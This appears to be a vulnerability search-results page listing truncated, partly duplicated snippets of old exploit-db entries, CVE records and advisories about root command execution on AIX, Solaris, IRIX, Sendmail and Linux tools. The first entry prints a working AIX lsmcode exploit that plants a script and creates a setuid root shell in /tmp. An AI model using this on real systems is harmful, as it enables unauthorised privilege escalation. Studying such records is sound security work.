AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution

No description provided by source. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

Fedora Core 2 : foomatic-3.0.1-3.1 (2004-303)

Sebastian Krahmer reported a bug in the cupsomatic and foomatic-rip print filters, used by the CUPS print spooler. An attacker who has printing access could send a carefully named file to the print server causing arbitrary commands to be executed as root. The Common Vulnerabilities and Exposures...

CVE-2002-1548

Unknown vulnerability in autofs on AIX 4.3.0, when using executable maps, allows attackers to execute arbitrary commands as root, possibly related to "string handling around how the executable map is called."...

CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)

CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link 2 source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. When CDRDAO saves...

sonata-teleconf-2.txt

Here you go alan! -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability Report 2 For Voyant Technologies Sonata Conferencing product. Larry W. Cashdollar Vapid Labs Date Published: 12/18/2000 Advisory ID: 12182000-02 CVE CAN: None currently assigned. Title: Sonata doroot command...

БОльшая дырка в Aptis Totalbill

Демон на одном из портов позволяет выполнять любые команды с привилегией root без авторизации...

S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (2)

// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possib...

gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow (2)

gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow 2 // source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for ...

S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)

// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possib...

Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)

/ source: https://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing...

CVE-1999-0163

In older versions of Sendmail, an attacker could use a pipe character to execute root commands...

CVE-1999-0003

Execute commands as root via buffer overflow in Tooltalk database server rpc.ttdbserverd...

CVE-1999-0003

CVE-1999-0003: A buffer overflow in the ToolTalk database server (rpc.ttdbserverd) may allow an attacker to execute arbitrary commands as root. Affected component is ToolTalk’s object database server; exploitation would require access to the vulnerable service. In the provided references, the imp...

CVE-1999-0038

CVE-1999-0038 describes a buffer overflow in the xlock program that allows local users to execute commands as root. The connected sources (Red Hat CVE entry, PT Security listing, and multiple feeds) corroborate a local-privilege escalation due to a buffer overflow in xlock, but the documents do n...

CVE-1999-0003

Execute commands as root via buffer overflow in Tooltalk database server rpc.ttdbserverd...

SGI IRIX 6.2 - 'day5notifier' Local Privilege Escalation

!/bin/sh source: https://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely replaces a number of system calls with execve calls...

CVE-1999-0163

In older versions of Sendmail, an attacker could use a pipe character to execute root commands...

AZL-7358 CVE-1999-0163 affecting package sendmail 8.15.2-46

In older versions of Sendmail, an attacker could use a pipe character to execute root commands...

PT-1997-1095 · Sendmail · Sendmail

Name of the Vulnerable Software and Affected Versions: Sendmail version 8.6.9 Description: The issue allows remote attackers to execute root commands using ident. Recommendations: For Sendmail version 8.6.9, update to a newer version that contains a fix for this issue...